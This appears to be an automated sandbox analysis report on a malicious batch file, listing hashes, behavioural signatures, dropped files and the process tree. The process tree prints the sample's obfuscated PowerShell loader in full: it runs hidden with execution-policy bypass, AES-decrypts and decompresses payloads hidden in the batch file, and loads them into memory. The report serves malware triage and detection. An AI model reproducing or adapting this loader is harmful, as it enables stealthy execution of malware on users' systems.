Analysis
-
max time kernel
29s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230621-en -
resource tags
arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system -
submitted
05-07-2023 11:34
Static task
static1
Behavioral task
behavioral1
Sample
4ukpag0ymmbat.bat
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
4ukpag0ymmbat.bat
Resource
win10v2004-20230703-en
General
-
Target
4ukpag0ymmbat.bat
-
Size
12.7MB
-
MD5
a6eb306f1a365c355e0db7cf5516019c
-
SHA1
3825d2a7c41c8c8ed6d646741ad42343d94fa5de
-
SHA256
4e1e20c34301d329fb9f36d346464ef839dc9619646c5f3c26d7510e9ca51811
-
SHA512
2ea9ffdfed9bad624e235022b011fb76bb4270c73a564ce11e130b6005cfa63b93b7d9c9931afebc213bf4ad20e493d0405a457e3a58aa84bdd5a646596d0412
-
SSDEEP
49152:+FgeGtxeM/etcJW4EQsw9n/udfp1V7HlAQ5uYv0JIloBhA20R0VEflHvfrM2+nxn:T
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 684 4ukpag0ymmbat.bat.exe -
Loads dropped DLL 1 IoCs
pid Process 1276 cmd.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 684 4ukpag0ymmbat.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 684 4ukpag0ymmbat.bat.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1276 wrote to memory of 1136 1276 cmd.exe 28 PID 1276 wrote to memory of 1136 1276 cmd.exe 28 PID 1276 wrote to memory of 1136 1276 cmd.exe 28 PID 1136 wrote to memory of 1684 1136 net.exe 29 PID 1136 wrote to memory of 1684 1136 net.exe 29 PID 1136 wrote to memory of 1684 1136 net.exe 29 PID 1276 wrote to memory of 684 1276 cmd.exe 30 PID 1276 wrote to memory of 684 1276 cmd.exe 30 PID 1276 wrote to memory of 684 1276 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\4ukpag0ymmbat.bat"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:1684
-
-
-
C:\Users\Admin\AppData\Local\Temp\4ukpag0ymmbat.bat.exe"4ukpag0ymmbat.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function xKuue($cvXZS){ $uAvyf=[System.Security.Cryptography.Aes]::Create(); $uAvyf.Mode=[System.Security.Cryptography.CipherMode]::CBC; $uAvyf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $uAvyf.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BCNQP2V2g5QVJ+KYVXfbsOlqSGQcI7crsDEaoGOxGzg='); $uAvyf.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8ezLrKD7ICNHucbi81JBAw=='); $LsnFR=$uAvyf.CreateDecryptor(); $return_var=$LsnFR.TransformFinalBlock($cvXZS, 0, $cvXZS.Length); $LsnFR.Dispose(); $uAvyf.Dispose(); $return_var;}function TNAcr($cvXZS){ $BWAiv=New-Object System.IO.MemoryStream(,$cvXZS); $nGKHJ=New-Object System.IO.MemoryStream; $QAMUv=New-Object System.IO.Compression.GZipStream($BWAiv, [IO.Compression.CompressionMode]::Decompress); $QAMUv.CopyTo($nGKHJ); $QAMUv.Dispose(); $BWAiv.Dispose(); $nGKHJ.Dispose(); $nGKHJ.ToArray();}function Zcsld($cvXZS,$XETSX){ $OMpUu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$cvXZS); $OBqgH=$OMpUu.EntryPoint; $OBqgH.Invoke($null, $XETSX);}$CQwfD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\4ukpag0ymmbat.bat').Split([Environment]::NewLine);foreach ($LuQZM in $CQwfD) { if ($LuQZM.StartsWith(':: ')) { $pRzKy=$LuQZM.Substring(4); break; }}$ZGtBs=[string[]]$pRzKy.Split('\');$RIKPL=TNAcr (xKuue ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZGtBs[0])));$mHTWH=TNAcr (xKuue ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZGtBs[1])));Zcsld $mHTWH (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Zcsld $RIKPL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:684
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d